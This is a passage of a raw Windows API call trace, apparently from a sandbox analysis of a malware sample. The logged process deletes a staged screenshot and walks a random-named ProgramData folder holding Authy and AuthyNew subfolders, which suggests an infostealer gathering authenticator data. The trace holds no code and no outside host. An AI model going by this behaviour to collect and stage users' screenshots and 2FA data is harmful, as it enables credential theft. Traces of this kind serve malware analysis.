| out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e844*=0x1, lpOverlapped=0x0) returned 1 [0116.487] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e838, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e838*=0x1, lpOverlapped=0x0) returned 1 [0116.487] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e82c, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e82c*=0x1, lpOverlapped=0x0) returned 1 [0116.487] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e820, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e820*=0x1, lpOverlapped=0x0) returned 1 [0116.488] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e814, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e814*=0x1, lpOverlapped=0x0) returned 1 [0116.488] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e850, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e850*=0x1, lpOverlapped=0x0) returned 1 [0116.488] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e844, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e844*=0x1, lpOverlapped=0x0) returned 1 [0116.488] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e838, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e838*=0x1, lpOverlapped=0x0) returned 1 [0116.488] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e82c, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e82c*=0x1, lpOverlapped=0x0) returned 1 [0116.488] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e820, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e820*=0x1, lpOverlapped=0x0) returned 1 [0116.488] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e814, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e814*=0x1, lpOverlapped=0x0) returned 1 [0116.488] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e850, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e850*=0x1, lpOverlapped=0x0) returned 1 [0116.488] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e844, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e844*=0x1, lpOverlapped=0x0) returned 1 [0116.488] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e838, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e838*=0x1, lpOverlapped=0x0) returned 1 [0116.488] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e82c, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e82c*=0x1, lpOverlapped=0x0) returned 1 [0116.489] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e820, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e820*=0x1, lpOverlapped=0x0) returned 1 [0116.489] WriteFile (in: hFile=0x358, lpBuffer=0x19e87c*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x19e814, lpOverlapped=0x0 | out: lpBuffer=0x19e87c*, lpNumberOfBytesWritten=0x19e814*=0x1, lpOverlapped=0x0) returned 1 [0116.489] WriteFile (in: hFile=0x358, lpBuffer=0x19e9f4*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x19e850, lpOverlapped=0x0 | out: lpBuffer=0x19e9f4*, lpNumberOfBytesWritten=0x19e850*=0xf, lpOverlapped=0x0) returned 1 [0116.489] WriteFile (in: hFile=0x358, lpBuffer=0x19ec0c*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x19e850, lpOverlapped=0x0 | out: lpBuffer=0x19ec0c*, lpNumberOfBytesWritten=0x19e850*=0x11, lpOverlapped=0x0) returned 1 [0116.489] SetFilePointer (in: hFile=0x358, lDistanceToMove=190959, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2e9ef [0116.489] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x9) returned 0x29aabb8 [0116.489] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x360) returned 0x29a8798 [0116.489] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2930 | out: hHeap=0x29a0000) returned 1 [0116.489] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39706f0 | out: hHeap=0x29a0000) returned 1 [0116.489] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a36d0 | out: hHeap=0x29a0000) returned 1 [0116.489] DeleteFileW (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\screenshot.jpg" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\screenshot.jpg")) returned 1 [0116.492] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a27c8 | out: hHeap=0x29a0000) returned 1 [0116.492] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19ee38 | out: lpFindFileData=0x19ee38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x351b72b5, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x351b72b5, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x351b72b5, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Soft", cAlternateFileName="")) returned 1 [0116.492] lstrcpyW (in: lpString1=0x19f088, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files" [0116.492] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\" [0116.492] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\", lpString2="Soft" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft" [0116.492] lstrcpyW (in: lpString1=0x19f290, lpString2="" | out: lpString1="") returned="" [0116.492] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0116.492] lstrcatW (in: lpString1="\\", lpString2="Soft" | out: lpString1="\\Soft") returned="\\Soft" [0116.493] lstrcmpW (lpString1="Soft", lpString2=".") returned 1 [0116.493] lstrcmpW (lpString1="Soft", lpString2="..") returned 1 [0116.493] lstrcpyW (in: lpString1=0x19eb18, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft" [0116.493] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft", lpString2="\\*.*" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\*.*") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\*.*" [0116.493] FindFirstFileW (in: lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\*.*", lpFindFileData=0x19e4b8 | out: lpFindFileData=0x19e4b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x351b72b5, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x351b72b5, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x351cd301, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x743420 [0116.493] lstrcpyW (in: lpString1=0x19e708, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft" [0116.493] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\" [0116.493] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\", lpString2="." | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\.") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\." [0116.493] lstrcpyW (in: lpString1=0x19e910, lpString2="\\Soft" | out: lpString1="\\Soft") returned="\\Soft" [0116.493] lstrcatW (in: lpString1="\\Soft", lpString2="\\" | out: lpString1="\\Soft\\") returned="\\Soft\\" [0116.493] lstrcatW (in: lpString1="\\Soft\\", lpString2="." | out: lpString1="\\Soft\\.") returned="\\Soft\\." [0116.493] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0116.493] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19e4b8 | out: lpFindFileData=0x19e4b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x351b72b5, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x351b72b5, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x351cd301, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.493] lstrcpyW (in: lpString1=0x19e708, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft" [0116.493] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\" [0116.493] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\", lpString2=".." | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\..") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\.." [0116.493] lstrcpyW (in: lpString1=0x19e910, lpString2="\\Soft" | out: lpString1="\\Soft") returned="\\Soft" [0116.493] lstrcatW (in: lpString1="\\Soft", lpString2="\\" | out: lpString1="\\Soft\\") returned="\\Soft\\" [0116.493] lstrcatW (in: lpString1="\\Soft\\", lpString2=".." | out: lpString1="\\Soft\\..") returned="\\Soft\\.." [0116.493] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0116.493] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0116.493] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19e4b8 | out: lpFindFileData=0x19e4b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x351bd509, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x351bd509, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x351bd509, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Authy", cAlternateFileName="")) returned 1 [0116.494] lstrcpyW (in: lpString1=0x19e708, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft" [0116.494] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\" [0116.494] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\", lpString2="Authy" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\Authy") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\Authy" [0116.494] lstrcpyW (in: lpString1=0x19e910, lpString2="\\Soft" | out: lpString1="\\Soft") returned="\\Soft" [0116.494] lstrcatW (in: lpString1="\\Soft", lpString2="\\" | out: lpString1="\\Soft\\") returned="\\Soft\\" [0116.494] lstrcatW (in: lpString1="\\Soft\\", lpString2="Authy" | out: lpString1="\\Soft\\Authy") returned="\\Soft\\Authy" [0116.494] lstrcmpW (lpString1="Authy", lpString2=".") returned 1 [0116.494] lstrcmpW (lpString1="Authy", lpString2="..") returned 1 [0116.494] lstrcpyW (in: lpString1=0x19e198, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\Authy" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\Authy") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\Authy" [0116.494] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\Authy", lpString2="\\*.*" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\Authy\\*.*") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\Authy\\*.*" [0116.494] FindFirstFileW (in: lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\Authy\\*.*", lpFindFileData=0x19db38 | out: lpFindFileData=0x19db38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x351bd509, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x351bd509, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x351bd509, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x743260 [0116.494] lstrcpyW (in: lpString1=0x19dd88, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\Authy" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\Authy") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\Authy" [0116.494] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\Authy", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\Authy\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\Authy\\" [0116.494] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\Authy\\", lpString2="." | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\Authy\\.") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\Authy\\." [0116.494] lstrcpyW (in: lpString1=0x19df90, lpString2="\\Soft\\Authy" | out: lpString1="\\Soft\\Authy") returned="\\Soft\\Authy" [0116.494] lstrcatW (in: lpString1="\\Soft\\Authy", lpString2="\\" | out: lpString1="\\Soft\\Authy\\") returned="\\Soft\\Authy\\" [0116.494] lstrcatW (in: lpString1="\\Soft\\Authy\\", lpString2="." | out: lpString1="\\Soft\\Authy\\.") returned="\\Soft\\Authy\\." [0116.494] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0116.494] FindNextFileW (in: hFindFile=0x743260, lpFindFileData=0x19db38 | out: lpFindFileData=0x19db38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x351bd509, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x351bd509, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x351bd509, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.494] lstrcpyW (in: lpString1=0x19dd88, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\Authy" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\Authy") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\Authy" [0116.494] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\Authy", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\Authy\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\Authy\\" [0116.495] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\Authy\\", lpString2=".." | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\Authy\\..") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\Authy\\.." [0116.495] lstrcpyW (in: lpString1=0x19df90, lpString2="\\Soft\\Authy" | out: lpString1="\\Soft\\Authy") returned="\\Soft\\Authy" [0116.495] lstrcatW (in: lpString1="\\Soft\\Authy", lpString2="\\" | out: lpString1="\\Soft\\Authy\\") returned="\\Soft\\Authy\\" [0116.495] lstrcatW (in: lpString1="\\Soft\\Authy\\", lpString2=".." | out: lpString1="\\Soft\\Authy\\..") returned="\\Soft\\Authy\\.." [0116.495] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0116.495] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0116.495] FindNextFileW (in: hFindFile=0x743260, lpFindFileData=0x19db38 | out: lpFindFileData=0x19db38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x351bd509, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x351bd509, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x351bd509, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0116.495] FindClose (in: hFindFile=0x743260 | out: hFindFile=0x743260) returned 1 [0116.495] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a36d0 [0116.495] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\Authy", cchWideChar=58, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 58 [0116.495] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3a) returned 0x29a2ed0 [0116.495] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\Authy", cchWideChar=58, lpMultiByteStr=0x29a2ed0, cbMultiByte=58, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\Authy", lpUsedDefaultChar=0x0) returned 58 [0116.495] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2f18 [0116.495] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2ed0 | out: hHeap=0x29a0000) returned 1 [0116.495] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a36d0 | out: hHeap=0x29a0000) returned 1 [0116.495] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19ed40, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0116.495] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x8) returned 0x29a6948 [0116.495] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19ed40, cbMultiByte=4, lpWideCharStr=0x29a6948, cchWideChar=4 | out: lpWideCharStr="*.*") returned 4 [0116.495] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6948 | out: hHeap=0x29a0000) returned 1 [0116.495] PathMatchSpecW (pszFile="Authy", pszSpec="*.*") returned 1 [0116.495] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a36d0 [0116.496] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970560 [0116.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\Authy", cchWideChar=58, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 58 [0116.496] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3a) returned 0x29a2c48 [0116.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\Authy", cchWideChar=58, lpMultiByteStr=0x29a2c48, cbMultiByte=58, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\Authy", lpUsedDefaultChar=0x0) returned 58 [0116.496] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2db0 [0116.496] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2c48 | out: hHeap=0x29a0000) returned 1 [0116.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\Soft\\Authy", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.496] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x29aaba0 [0116.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\Soft\\Authy", cchWideChar=12, lpMultiByteStr=0x29aaba0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\Soft\\Authy", lpUsedDefaultChar=0x0) returned 12 [0116.496] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aaba0 | out: hHeap=0x29a0000) returned 1 [0116.496] CreateFileA (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\Authy" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\soft\\authy"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0116.496] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2db0 | out: hHeap=0x29a0000) returned 1 [0116.496] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970560 | out: hHeap=0x29a0000) returned 1 [0116.496] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a36d0 | out: hHeap=0x29a0000) returned 1 [0116.496] DeleteFileW (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\Authy" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\soft\\authy")) returned 0 [0116.496] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2f18 | out: hHeap=0x29a0000) returned 1 [0116.496] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19e4b8 | out: lpFindFileData=0x19e4b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x351cd301, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x351cd301, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x351cd301, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AuthyNew", cAlternateFileName="")) returned 1 [0116.496] lstrcpyW (in: lpString1=0x19e708, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft" [0116.496] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\" [0116.496] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\", lpString2="AuthyNew" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\AuthyNew") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\AuthyNew" [0116.496] lstrcpyW (in: lpString1=0x19e910, lpString2="\\Soft" | out: lpString1="\\Soft") returned="\\Soft" [0116.496] lstrcatW (in: lpString1="\\Soft", lpString2="\\" | out: lpString1="\\Soft\\") returned="\\Soft\\" [0116.496] lstrcatW (in: lpString1="\\Soft\\", lpString2="AuthyNew" | out: 